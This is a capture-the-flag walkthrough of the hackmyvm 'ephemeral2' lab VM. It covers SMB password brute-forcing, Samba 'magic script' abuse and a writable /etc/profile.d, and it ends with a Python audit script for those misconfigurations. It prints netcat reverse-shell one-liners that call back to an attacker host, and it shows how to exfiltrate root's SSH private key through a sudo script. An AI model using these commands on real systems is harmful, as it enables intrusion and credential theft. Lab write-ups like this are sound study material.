The free CTF challenge web site “hackmyvm.eu” has another medium-level VM called ‘ephemeral2‘ for us to download, enumerate and get some flags from. In this write-up I will try to describe my method and thought process on how I completed this hackmyvm ephemeral2 CTF challenge.
Setup for hackmyvm ephemeral2
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.10 – This is the ephemeral2 vm.
For enumeration of the hackmyvm ephemeral2 challenge I will be using the BlackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux system to proceed.
The first command to run is nmap for network services enumeration.
There are only 4 ports open:
- 80, http
- 22, ssh
- 139 and 445, smb
Using a web fuzzer against the website I found nothing of interest, so let's dig deeper into the Samba side and use the command below to see if we can get any user information.
enum4linux -U 192.168.186.10
After it has run for a minute we get a username:
Account: randy Name: randy
Now to get the share list:
enum4linux -S 192.168.186.10
This results in a list of the directories shared by Samba. Only one is of interest, and it is shown below.
Sharename  Type  Comment
---------  ----  -------
SYSADMIN   Disk
But the user name and share name alone are not enough to mount the remote file system (SYSADMIN); I still need randy's password, so I used smbrute to try to find it. I used the rockyou.txt password list and it took a long time, so be prepared to wait. Also make sure you have smbclient installed before you run the smbrute script.
The script smbrute.py needs three things to run: a file with the user names, a file with the passwords and a target. So use a file containing the single user name “randy” and the rockyou.txt password list from GitHub. If rockyou.txt is too big you will have to split it up. Hint: the password is in the top 2000 entries of this file.
python3 ./smbrute.py -t 192.168.186.10 -u /tmp/users -p /opt/rockyou.txt
Eventually you will get the password; just wait. Once you have it you can mount the share.
sudo mount -t cifs -o username=randy //192.168.186.10/SYSADMIN /mnt
There are some interesting files; take a look at them. The one I am most interested in is the smb.conf file, and in particular randy's share configuration.
Look up what the Samba “magic script” option does; it's really interesting. After you have looked that up, create a reverse shell script (the copy command further down assumes it is saved as /tmp/rev.sh).
Put in the below contents.
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 4444 >/tmp/f
Now, in another window on the enumeration system, open a netcat listener to catch the shell.
nc -vlnp 4444
Then copy your reverse shell script into the mounted share. If you are not root, be sure to use sudo.
sudo cp /tmp/rev.sh /mnt/smbscript.elf
You should get a shell in the netcat terminal window.
After some poking around you can find two things:
- /etc/profile.d is writable
- There is a job that runs ssh for the user ralph, in cron, every minute (see /etc/crontab).
Another Reverse Shell
All scripts in /etc/profile.d are run when someone logs in, so when the cron job runs ssh for the user “ralph” it can be used to spawn another reverse shell. Modify the reverse shell script we created earlier to look like the below.
#!/bin/bash
rm /tmp/k;mkfifo /tmp/k;cat /tmp/k|sh -i 2>&1|nc 192.168.186.150 4445 >/tmp/k
Put it in “/etc/profile.d/shell.sh” on the ephemeral2 host. Then, in another window on the enumeration host, run another netcat listener.
nc -vlnp 4445
Now we have another shell, this time as the user “ralph”.
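Both footholds so far rest on misconfigurations an administrator can audit: a share that sets Samba's “magic script” option (the smb.conf finding above) and a writable /etc/profile.d (the login-script finding above). The Python audit script below is an added example and is not part of the original write-up or the VM; the sample smb.conf and the script file name in it are constructed placeholders.

```python
import configparser
import os
import stat

# Constructed sample smb.conf modelled on the SYSADMIN share from the write-up;
# the "magic script" file name is a placeholder, not the VM's actual value.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   security = user

[SYSADMIN]
   path = /srv/sysadmin
   valid users = randy
   writable = yes
   magic script = smbscript.elf
"""


def find_magic_script_shares(conf_text):
    """Map share name -> script name for every share that sets 'magic script'.

    Samba runs that file as the connected user as soon as the client closes it,
    so on a writable share it is a code-execution path for anyone holding share
    credentials. strict=False tolerates the duplicate keys smb.conf allows.
    """
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.read_string(conf_text)
    return {sec: parser.get(sec, "magic script").strip()
            for sec in parser.sections()
            if parser.has_option(sec, "magic script")}


def is_group_or_world_writable(mode):
    """True if the permission bits allow writes by group or others."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def loose_profile_d(directory="/etc/profile.d"):
    """Return the directory and any entry in it that is group- or world-writable.

    Every login shell sources these scripts, so a loose entry lets one local
    account run code as every user who logs in (including cron-driven ssh).
    """
    if not os.path.isdir(directory):
        return []
    paths = [directory] + [os.path.join(directory, name)
                           for name in sorted(os.listdir(directory))]
    return [p for p in paths if is_group_or_world_writable(os.lstat(p).st_mode)]
```

On a real host, feed the contents of /etc/samba/smb.conf to find_magic_script_shares and run loose_profile_d as root; the fix is to drop “magic script” from the share (or make it read-only) and keep /etc/profile.d root-owned at mode 755 with 644 files.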
Stabilize the shell.
Take a look at the output of sudo -l.
The script listed there does something interesting with the files you give it. Try to figure it out.
Netcat One More Time
On yet another terminal on your enumeration host, run netcat again.
nc -vlnp 4446
Now run the sudo command:
sudo /usr/bin/python3 /home/ralph/getfile.py
When the “File path” prompt appears, enter:
File path: /root/.ssh/id_rsa
When the IP prompt appears, enter the IP of your enumeration host and the port you ran netcat on:
IP address: 192.168.186.150:4446
All going well, the root SSH private key will appear in the netcat window.
Save it on the ephemeral2 system somewhere (I used /tmp/key.pem). Set the permissions to 600 and use the commands below to get onto the system as root.
vi /tmp/key.pem
chmod 600 /tmp/key.pem
ssh -i /tmp/key.pem root@localhost
I found this room challenging and engaging. Thanks to rpj7 for pointing out that running the same command more than once can yield different results.